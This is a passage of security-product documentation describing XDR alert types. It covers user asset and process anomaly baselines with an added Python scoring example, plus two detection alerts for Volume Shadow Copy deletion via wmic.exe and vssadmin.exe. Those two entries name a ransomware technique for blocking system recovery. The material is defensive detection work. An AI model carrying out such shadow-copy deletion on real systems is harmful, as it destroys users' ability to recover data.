The user is identified with the srcip_usersid or user.identifier and srcip_username fields. The process is identified with the process_name field. The host on which the user is running the process is identified with the srcip_host field. The destination of the traffic generated by the process is identified with the dstip_host field. Stability is identified with the stability field, and diversity is identified with the diversity field.
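The User Asset Access Anomaly and User Process Usage Anomaly use cases above share one baseline pattern: a user with a small, stable set of items (assets or processes) is examined, and a new item breaks the baseline. The following is an added example (not Stellar Cyber code) that implements that pattern for both alert types with child_count, days_stable and derived diversity and stability scores; the score formulas, thresholds, SID and host names are assumptions constructed for the example.

```python
"""Added example, not Stellar Cyber code: the user-baseline logic shared by the
User Asset Access Anomaly and User Process Usage Anomaly alert types. The score
formulas and thresholds are assumptions; the product does not publish its own."""
from dataclasses import dataclass, field
from datetime import date
from typing import Optional

DIVERSITY_SCALE, STABILITY_SCALE = 10, 14   # assumed: scores saturate near these counts/days
MAX_DIVERSITY, MIN_STABILITY = 0.4, 0.6     # assumed: "small number of items", "long time stable"

@dataclass
class UserBaseline:
    """Distinct items a user has been seen with: assets (srcip_host) or processes (process_name)."""
    user_id: str                      # srcip_usersid, or user.identifier on Windows feeds
    items: set = field(default_factory=set)
    last_new: Optional[date] = None   # day the most recent new item was first seen

    def child_count(self) -> int:
        return len(self.items)

    def days_stable(self, today: date) -> int:
        return (today - self.last_new).days if self.last_new else 0

    def diversity(self) -> float:     # rises with child_count, bounded in [0, 1)
        return self.child_count() / (self.child_count() + DIVERSITY_SCALE)

    def stability(self, today: date) -> float:   # rises with days_stable, bounded in [0, 1)
        return self.days_stable(today) / (self.days_stable(today) + STABILITY_SCALE)

def observe(b: UserBaseline, item: str, today: date, item_field: str) -> Optional[dict]:
    """Feed one login (item_field="srcip_host") or process run (item_field="process_name").
    Returns an alert dict using the page's key fields when a new item breaks a stable, narrow baseline."""
    if item in b.items:
        return None                   # already in the baseline: nothing to report
    alert = None                      # scores come from the history before the new item is admitted
    if b.diversity() <= MAX_DIVERSITY and b.stability(today) >= MIN_STABILITY:
        alert = {"srcip_usersid": b.user_id, item_field: item, "child_count": b.child_count(),
                 "days_stable": b.days_stable(today), "diversity": round(b.diversity(), 3),
                 "stability": round(b.stability(today), 3)}
    b.items.add(item)                 # the new item joins the baseline whether or not it alerted
    b.last_new = today
    return alert

def demo() -> list:
    """Constructed sequence: two hosts learned on consecutive days, then a third after 60 quiet days."""
    b = UserBaseline("S-1-5-21-0-0-0-1001")       # constructed SID
    return [observe(b, host, day, "srcip_host") for host, day in
            (("WS-A", date(2024, 1, 1)), ("WS-B", date(2024, 1, 2)), ("WS-C", date(2024, 3, 2)))]
```

Only the third observation alerts: the first two arrive before the baseline is stable, while WS-C appears after 60 days with no new asset for a user who has only ever used two.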
Volume Shadow Copy Deletion via WMIC
The wmic.exe utility was used to delete the Shadow Copy on an endpoint. Ransomware and other malware do this to prevent system recovery. Check with the user.
XDR Kill Chain
- Kill Chain Stage: Exfiltration & Impact
- Tactic: Impact (TA0040)
- Technique: Inhibit System Recovery (T1490)
- Tags: [Malware; Ransomware]
Event Name
The xdr_event.name for this alert type in the Interflow data is ransomware_volume_shadow_copy_deletion_via_wmic.
Key Fields and Relevant Data Points
- hostip — IP address of the host where the Shadow Copy was deleted
- process_name — name of the process
- event_data.CommandLine — command that was executed
Use Case with Data Points
If wmic.exe is used to delete the Shadow Copy on an endpoint, an alert is triggered. The Interflow includes the host IP address (hostip), process name (process_name), and command line (event_data.CommandLine).
Volume Shadow Copy Deletion via VssAdmin
The vssadmin.exe utility was used to delete the Shadow Copy on an endpoint. Ransomware and other malware do this to prevent system recovery. Check with the user.
XDR Kill Chain
- Kill Chain Stage: Exfiltration & Impact
- Tactic: Impact (TA0040)
- Technique: Inhibit System Recovery (T1490)
- Tags: [Malware; Ransomware]
Event Name
The xdr_event.name for this alert type in the Interflow data is ransomware_volume_shadow_copy_deletion_via_vssadmin.
Key Fields and Relevant Data Points
- hostip — IP address of the host where the Shadow Copy was deleted
- process_name — name of the process
- event_data.CommandLine — command that was executed
Use Case with Data Points
If vssadmin.exe is used to delete the Shadow Copy on an endpoint, an alert is triggered. The Interflow includes the host IP address (hostip), process name (process_name), and command line (event_data.CommandLine).